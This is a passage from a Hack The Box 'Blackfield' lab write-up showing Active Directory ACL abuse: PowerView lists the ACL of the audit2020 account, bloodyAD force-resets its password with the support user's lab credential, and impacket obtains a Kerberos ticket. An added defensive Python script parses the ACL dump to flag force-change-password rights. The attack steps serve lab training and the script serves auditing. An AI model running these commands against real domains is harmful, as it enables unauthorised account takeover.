ForceChangePassword


As previously enumerated through BloodHound, the support user is able to change the password of the audit2020 account.

┌──(kali㉿kali)-[~/archive/htb/labs/blackfield]
└─$ KRB5CCNAME=support@dc01.blackfield.local.ccache powerview 'BLACKFIELD.LOCAL/@dc01.blackfield.local' -k --no-pass --use-ldap --dc-ip $IP -q 'Get-ObjectAcl CN=AUDIT2020,CN=USERS,DC=BLACKFIELD,DC=LOCAL -ResolveGUIDs' -d
 
[...REDACTED...]
 
objectdn                    : CN=audit2020,CN=Users,DC=BLACKFIELD,DC=local
objectsid                   : S-1-5-21-4194615774-2175524697-3563712290-1103
acetype                     : ACCESS_ALLOWED_OBJECT_ACE
aceflags                    : None
access mask                 : ControlAccess
objectaceflags              : ACE_OBJECT_TYPE_PRESENT
objectacetype               : Change Password (ab721a53-1e2f-11d0-9819-00aa0040529b)
inheritancetype             : None
securityidentifier          : support (S-1-5-21-4194615774-2175524697-3563712290-1104)
 
objectdn                    : CN=audit2020,CN=Users,DC=BLACKFIELD,DC=local
objectsid                   : S-1-5-21-4194615774-2175524697-3563712290-1103
acetype                     : ACCESS_ALLOWED_OBJECT_ACE
aceflags                    : None
access mask                 : ControlAccess
objectaceflags              : ACE_OBJECT_TYPE_PRESENT
objectacetype               : Reset Password (00299570-246d-11d0-a768-00aa006e0529)
inheritancetype             : None
securityidentifier          : support (S-1-5-21-4194615774-2175524697-3563712290-1104)
 
objectdn                    : CN=audit2020,CN=Users,DC=BLACKFIELD,DC=local
objectsid                   : S-1-5-21-4194615774-2175524697-3563712290-1103
acetype                     : ACCESS_ALLOWED_ACE
aceflags                    : None
activedirectoryrights       : ReadControl,ReadProperties,ListChildObjects
access mask                 : 0x20014
inheritancetype             : None
securityidentifier          : support (S-1-5-21-4194615774-2175524697-3563712290-1104)

Using the Python implementation of PowerView, I can list the ACL of the audit2020 account; three ACEs are granted to the support user in relation to the ForceChangePassword privilege.
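From the defender's side, the same ACL dump is what an audit script would parse. The following added Python (not part of the writeup) reads a Get-ObjectAcl dump like the one above and flags ACEs granting the User-Force-Change-Password extended right, the Reset Password GUID 00299570-246d-11d0-a768-00aa006e0529, which is the right BloodHound draws as ForceChangePassword; the Change Password right (ab721a53-1e2f-11d0-9819-00aa0040529b) only permits a change when the current password is already known. The sample input is constructed from the output above with some fields trimmed.

```python
import re
# Added example (not from the writeup): audit a PowerView-style ACL dump for the
# User-Force-Change-Password extended right (BloodHound's ForceChangePassword edge).
FORCE_CHANGE_PASSWORD_GUID = "00299570-246d-11d0-a768-00aa006e0529"  # "Reset Password"

# Constructed sample modelled on the Get-ObjectAcl output above (some fields trimmed).
SAMPLE_ACL = """\
objectdn                    : CN=audit2020,CN=Users,DC=BLACKFIELD,DC=local
acetype                     : ACCESS_ALLOWED_OBJECT_ACE
access mask                 : ControlAccess
objectacetype               : Change Password (ab721a53-1e2f-11d0-9819-00aa0040529b)
securityidentifier          : support (S-1-5-21-4194615774-2175524697-3563712290-1104)

objectdn                    : CN=audit2020,CN=Users,DC=BLACKFIELD,DC=local
acetype                     : ACCESS_ALLOWED_OBJECT_ACE
access mask                 : ControlAccess
objectacetype               : Reset Password (00299570-246d-11d0-a768-00aa006e0529)
securityidentifier          : support (S-1-5-21-4194615774-2175524697-3563712290-1104)

objectdn                    : CN=audit2020,CN=Users,DC=BLACKFIELD,DC=local
acetype                     : ACCESS_ALLOWED_ACE
activedirectoryrights       : ReadControl,ReadProperties,ListChildObjects
access mask                 : 0x20014
securityidentifier          : support (S-1-5-21-4194615774-2175524697-3563712290-1104)
"""

def parse_aces(text):
    """Split the dump into ACE records: blank-line separated 'key : value' blocks."""
    aces, current = [], {}
    for line in text.splitlines() + [""]:  # trailing "" flushes the last record
        if not line.strip():
            if current:
                aces.append(current)
            current = {}
            continue
        key, _, value = line.partition(":")
        current[key.strip()] = value.strip()
    return aces

def find_force_change_password(text):
    """Return (trustee, target DN) pairs for ACEs granting User-Force-Change-Password."""
    hits = []
    for ace in parse_aces(text):
        if ace.get("acetype") != "ACCESS_ALLOWED_OBJECT_ACE":
            continue  # plain ACEs carry no extended-right GUID
        match = re.search(r"\(([0-9a-fA-F-]{36})\)", ace.get("objectacetype", ""))
        if match and match.group(1).lower() == FORCE_CHANGE_PASSWORD_GUID:
            trustee = ace["securityidentifier"].split(" (")[0]
            hits.append((trustee, ace["objectdn"]))
    return hits
```

Running it over a dump of every user object turns up non-admin principals holding this right, which is the condition worth alerting on.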

┌──(kali㉿kali)-[~/archive/htb/labs/blackfield]
└─$ bloodyAD -d BLACKFIELD.LOCAL -u 'support' -p '#00^BlackKnight' --host dc01.blackfield.local set password CN=AUDIT2020,CN=USERS,DC=BLACKFIELD,DC=LOCAL Qwer1234
[+] Password changed successfully!

While there are many ways to change a user's password, I will be using bloodyAD.

Validation


┌──(kali㉿kali)-[~/archive/htb/labs/blackfield]
└─$ impacket-getTGT BLACKFIELD.LOCAL/audit2020@dc01.blackfield.local -k -dc-ip $IP 
Impacket v0.11.0 - Copyright 2023 Fortra
 
Password: Qwer1234
[*] Saving ticket in audit2020@dc01.blackfield.local.ccache

Validated: a TGT has been obtained and saved for the audit2020 account.